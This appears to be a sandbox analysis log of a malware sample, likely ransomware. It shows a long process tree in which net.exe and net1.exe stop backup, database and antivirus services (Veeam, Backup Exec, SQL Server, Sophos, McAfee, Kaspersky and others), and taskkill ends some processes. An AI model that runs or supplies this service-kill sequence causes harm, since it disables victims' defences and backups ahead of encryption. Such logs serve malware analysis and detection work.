C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:13556
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:4128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵PID:10356
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:3940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:13928
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:1392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:3224
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:1696
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵PID:13232
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵PID:1232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵PID:14340
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:12628
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:1832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵PID:12588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:2348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵PID:12520
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵PID:2996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵PID:12604
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:4948
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:12132
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵PID:12496
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵PID:4940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵PID:11356
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵PID:4636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:5244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:13984
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y2⤵PID:5252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵PID:12200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y2⤵PID:5272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵PID:12448
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:5280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:12564
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵PID:5504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵PID:12396
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵PID:5512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵PID:14120
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:5520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵PID:13160
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y2⤵PID:5528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵PID:12596
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:5536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:12140
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:5544
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:12692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵PID:5888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:14236
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵PID:6196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:13240
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:6204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:13564
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵PID:6220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:10284
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:6228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:13612
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:6236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:13152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵PID:6244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:14076
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵PID:6252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:12464
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:6260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:11628
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:6272
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:12684
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:6280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:13256
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:6812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:13952
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵PID:6824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:11432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵PID:6836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:14136
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:6844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:14152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵PID:6852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:13144
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:6860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:14088
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:6872
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:14480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵PID:6880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2112
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:14096
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:6888
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:15076
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:6900
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:13924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵PID:6908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:14112
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:6916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:14104
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:6924
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:14224
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵PID:6932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:13504
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:7228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:14428
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:7236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:14200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:7244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:14744
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:7256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:13960
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:7264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:14216
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:7276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:13944
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:7284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:15084
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:7728
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵PID:13580
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵PID:7740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:14144
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵PID:7748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:13480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:7764
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:14208
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:7776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:13968
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵PID:7784
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:13804
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:7792
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:14184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:8080
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:14192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵PID:8096
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:14176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:8104
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:7812
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵PID:7680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵PID:10016
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵PID:6400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:15068
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:4944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵PID:15948
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:6652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵PID:17316
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:7448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵PID:17260
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:7592
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:16412
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵PID:7660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:17468
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:2728
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵PID:11636
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵PID:4332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:14160
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:4060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵PID:17292
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵PID:8200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵PID:17284
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:8208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:15924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵PID:8216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:17412
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:8224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:15536
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵PID:8232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:1348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:8240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:17432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵PID:8260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:14904
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:8268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:15380
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵PID:8276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:16908
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:8284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵PID:15940
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵PID:8292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵PID:16392
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:8300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵PID:15060
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵PID:8308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵PID:15052
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:8320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵PID:14716
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:8328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵PID:14732
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:8336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵PID:8344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵PID:13308
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:8356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵PID:14168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵PID:8364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵PID:17308
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:8372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵PID:17424
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵PID:8384
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵PID:15932
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:8392
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵PID:17200
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵PID:8400
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵PID:15524
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:8412
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:15544
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵PID:8420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵PID:16984
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:8432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵PID:13892
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵PID:9172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵PID:17012
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵PID:9188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵PID:17340
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵PID:9204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵PID:15388
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:9212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵PID:17176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵PID:216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵PID:17572
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵PID:17168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:5072
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵PID:17324
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:9432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵PID:16472
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:9440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵PID:17440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:9456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵PID:16400
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵PID:9464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵PID:16776
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:9480
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵PID:17480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵PID:9488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵PID:2924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:9552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:17300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:9560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:7800
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:9568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:8156
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:9576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:17332
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵PID:9584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:17348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵PID:10712
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:17184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:10720
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:17192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:10788
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:17120
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:10796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵PID:17580
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵PID:10808
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:17104
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:10816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:17112
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:10828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2312
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:17588
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵PID:10836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:17128
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:10844
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:17540
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:10852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:9872
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:10860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:17808
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10868
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10880
-
-
